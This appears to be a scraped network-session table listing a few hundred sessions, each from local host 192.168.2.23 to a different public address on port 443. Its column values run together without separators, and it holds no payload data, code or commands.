                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18838192.168.2.2349568198.210.3.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18839192.168.2.234029674.16.214.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18840192.168.2.2346084182.216.23.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18841192.168.2.2356010183.207.238.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18842192.168.2.233961418.114.236.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18843192.168.2.2360910172.142.36.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18844192.168.2.234494218.166.116.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18845192.168.2.2341974145.244.108.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18846192.168.2.2337908180.9.117.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18847192.168.2.2352442188.229.57.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18848192.168.2.233440018.231.18.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18849192.168.2.233570679.250.175.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18850192.168.2.233568094.129.67.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18851192.168.2.235430631.63.228.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18852192.168.2.233530049.143.226.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18853192.168.2.233452273.153.40.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18854192.168.2.2344678140.188.0.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18855192.168.2.2349894118.127.255.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18856192.168.2.2360722171.235.143.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18857192.168.2.234796661.146.45.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18858192.168.2.2354702110.75.181.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18859192.168.2.2360012112.112.242.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18860192.168.2.2351466179.249.211.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18861192.168.2.2345314189.236.32.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18862192.168.2.2342372134.192.247.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18863192.168.2.234834888.48.171.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18864192.168.2.2340870157.157.107.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18865192.168.2.2353990144.33.65.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18866192.168.2.2347738216.76.198.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18867192.168.2.234254660.205.57.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18868192.168.2.233536454.97.98.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18869192.168.2.235115835.216.120.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18870192.168.2.2333090118.201.22.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18871192.168.2.2351458208.146.164.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18872192.168.2.234331825.59.191.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18873192.168.2.235072487.106.162.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18874192.168.2.2354978156.25.71.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18875192.168.2.235717649.166.192.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18876192.168.2.2344452195.143.117.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18877192.168.2.2341298193.94.99.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18878192.168.2.2352270157.193.31.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18879192.168.2.2357220134.218.44.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18880192.168.2.2351938188.168.115.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18881192.168.2.2355114105.185.76.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18882192.168.2.2358564133.161.15.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18883192.168.2.2343664172.111.39.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18884192.168.2.234216645.249.148.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18885192.168.2.233338858.24.183.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18886192.168.2.233993448.41.80.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18887192.168.2.233354619.10.243.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18888192.168.2.235452286.73.177.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18889192.168.2.2345026129.155.51.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18890192.168.2.235330018.17.241.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18891192.168.2.234729839.17.27.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18892192.168.2.2334076193.35.254.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18893192.168.2.2347882191.116.135.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18894192.168.2.2341678188.33.84.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18895192.168.2.2339596194.206.154.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18896192.168.2.234958268.203.213.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18897192.168.2.2341542180.110.236.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18898192.168.2.233715889.3.186.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18899192.168.2.2356036110.27.254.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18900192.168.2.2337248200.59.6.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18901192.168.2.2347066199.195.82.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18902192.168.2.2356684192.197.133.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18903192.168.2.2337294189.31.95.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18904192.168.2.234184662.171.109.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18905192.168.2.2355592108.87.85.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18906192.168.2.2344064178.249.50.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18907192.168.2.2343330151.228.235.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18908192.168.2.23367922.40.128.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18909192.168.2.23472248.46.158.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18910192.168.2.2343002193.148.119.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18911192.168.2.2341642121.116.131.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18912192.168.2.2341102190.131.151.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18913192.168.2.2353556118.6.83.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18914192.168.2.2357246133.216.174.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18915192.168.2.2341820124.183.196.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18916192.168.2.233506658.62.252.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18917192.168.2.23464248.37.229.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18918192.168.2.234014693.248.12.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18919192.168.2.2341450110.5.171.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18920192.168.2.2341874190.38.201.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18921192.168.2.236097458.150.81.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18922192.168.2.2346356160.68.114.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18923192.168.2.2357858149.66.218.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18924192.168.2.2338208135.98.50.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18925192.168.2.234152880.227.110.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18926192.168.2.2339284129.242.157.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18927192.168.2.234090627.221.125.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18928192.168.2.2357356132.151.139.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18929192.168.2.233327485.52.162.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18930192.168.2.2358274166.250.28.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18931192.168.2.2340650148.28.136.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18932192.168.2.2356162120.118.121.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18933192.168.2.23514409.123.140.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18934192.168.2.235315889.49.186.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18935192.168.2.233569027.9.234.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18936192.168.2.234576448.134.253.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18937192.168.2.2345204177.85.15.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18938192.168.2.234851487.104.176.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18939192.168.2.233819878.122.89.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18940192.168.2.234935079.117.41.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18941192.168.2.2335758132.180.134.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18942192.168.2.2335410172.139.205.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18943192.168.2.2339982118.76.142.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18944192.168.2.2358000195.199.144.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18945192.168.2.2340380109.14.56.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18946192.168.2.2336866170.200.171.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18947192.168.2.2335064158.152.69.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18948192.168.2.235518642.229.130.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18949192.168.2.2336876115.126.222.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18950192.168.2.2345478156.203.124.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18951192.168.2.2358878111.178.129.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18952192.168.2.2333910210.117.55.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18953192.168.2.2359284143.123.148.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18954192.168.2.2340540106.227.50.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18955192.168.2.2359948119.216.84.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18956192.168.2.2333916212.237.92.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18957192.168.2.2340888203.100.193.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18958192.168.2.2354910221.238.7.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18959192.168.2.235278244.103.202.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18960192.168.2.234411483.56.250.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18961192.168.2.235056668.161.251.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18962192.168.2.2334220120.14.169.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18963192.168.2.235428479.122.155.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18964192.168.2.2340530173.103.243.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18965192.168.2.2356248183.243.66.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18966192.168.2.2343662200.236.105.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18967192.168.2.2359000202.67.128.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18968192.168.2.2339730192.2.167.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18969192.168.2.2360866219.106.250.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18970192.168.2.2351214115.64.37.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18971192.168.2.234672245.37.7.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18972192.168.2.2337494120.236.125.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18973192.168.2.236011013.11.184.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18974192.168.2.233955090.46.135.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18975192.168.2.235955666.149.219.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18976192.168.2.233324841.244.200.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18977192.168.2.2345568185.48.96.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18978192.168.2.2346946210.1.167.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18979192.168.2.233288442.57.193.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18980192.168.2.2334366205.72.114.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18981192.168.2.2342228131.142.74.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18982192.168.2.2336416100.158.115.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18983192.168.2.235356237.69.58.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18984192.168.2.2351806114.214.227.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18985192.168.2.2349470206.209.243.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18986192.168.2.235922098.230.205.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18987192.168.2.2346250197.37.84.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18988192.168.2.2333272213.96.102.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18989192.168.2.233371292.51.22.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18990192.168.2.235222688.113.10.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18991192.168.2.23427664.100.109.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18992192.168.2.234046046.197.4.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18993192.168.2.2359340193.225.204.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18994192.168.2.235655677.241.56.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18995192.168.2.234960820.216.119.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18996192.168.2.235376699.114.106.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18997192.168.2.2350704216.130.130.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18998192.168.2.233796814.76.19.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18999192.168.2.2351418134.7.187.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19000192.168.2.235224297.130.183.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19001192.168.2.2360744132.102.27.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19002192.168.2.2336434174.181.6.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19003192.168.2.23457445.189.123.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19004192.168.2.2359610119.73.107.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19005192.168.2.233978483.74.233.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19006192.168.2.233324043.25.223.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19007192.168.2.2345918207.102.168.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19008192.168.2.2345168119.47.152.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19009192.168.2.2358080128.39.97.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19010192.168.2.235247439.162.233.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19011192.168.2.2356340113.255.215.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19012192.168.2.233856266.52.24.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19013192.168.2.2347906213.92.82.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19014192.168.2.23550182.24.182.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19015192.168.2.2354984161.28.177.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19016192.168.2.235055417.58.167.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19017192.168.2.2341078206.76.104.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19018192.168.2.233797248.127.126.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19019192.168.2.2357856211.59.244.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19020192.168.2.233549867.93.2.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19021192.168.2.234479438.33.39.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19022192.168.2.2335612165.149.61.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19023192.168.2.233891686.83.93.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19024192.168.2.2342736188.205.85.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19025192.168.2.2344770114.24.17.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19026192.168.2.235273484.124.124.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19027192.168.2.2350672199.91.254.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19028192.168.2.2336912217.20.126.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19029192.168.2.234503419.146.15.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19030192.168.2.2343158194.43.32.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19031192.168.2.233783467.114.146.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19032192.168.2.236012050.198.197.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19033192.168.2.234668666.147.171.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19034192.168.2.235079038.159.98.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19035192.168.2.233706467.190.128.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19036192.168.2.234123051.99.46.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19037192.168.2.23391562.70.254.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19038192.168.2.233774224.102.34.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19039192.168.2.2343542208.239.43.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19040192.168.2.235088836.246.167.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19041192.168.2.2355322108.211.73.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19042192.168.2.2348414169.70.65.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19043192.168.2.234453898.155.150.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19044192.168.2.2356080123.238.128.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19045192.168.2.2347672157.115.9.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19046192.168.2.2343318212.151.250.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19047192.168.2.2334504209.200.193.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19048192.168.2.2335402221.110.36.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19049192.168.2.2359558223.60.247.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19050192.168.2.2350802133.163.200.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19051192.168.2.2336612131.105.25.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19052192.168.2.2342450136.131.129.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19053192.168.2.233491240.219.49.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19054192.168.2.2334750160.97.26.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19055192.168.2.2352586206.9.246.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19056192.168.2.233937688.131.7.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19057192.168.2.2354866136.120.199.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19058192.168.2.235032085.142.8.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
